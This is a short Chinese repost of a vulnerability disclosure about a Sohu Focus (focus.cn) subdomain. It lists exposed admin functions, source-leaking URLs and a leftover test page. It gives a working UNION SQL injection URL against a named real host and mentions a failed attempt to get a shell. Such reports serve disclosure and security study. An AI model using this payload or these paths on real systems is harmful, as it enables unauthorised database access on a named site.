好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

搜狐焦点某站漏洞打包(后台权限泄漏、注入等

1、权限设置有问题:

直接访问后台的一个应用:ip转向审核(没搞清楚到底是干嘛的。。)

2、源码泄露

http://ncfile.focus.cn/common/modules/dmc/adm/rdistnsPYpl

http://ncfile.focus.cn/common/modules/dmc/votehouse_view.left.inc

http://ncfile.focus.cn/common/dao/dao.tpl.php

3、测试页面未删除暴露物理路径

http://ncfile.focus.cn/common/admin/test.php

 

4、 注入 ,支持union,有物理路径,可以查user表,貌似可以导出文件拿shell,但没成功,好像有过滤。。。

地址就是上面那个ip转向审核 系统 :

http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20limit%200,1–+

搜狐焦点某站 漏洞 打包(后台权限泄漏、注入等)

查看更多关于搜狐焦点某站漏洞打包(后台权限泄漏、注入等的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15417
  阅读:82次

上一篇: 如何利用注射技术攻击邮件服务器 - 网站安全

下一篇:利用CI自带的security安全类实现防止跨站请求-表单

相关资讯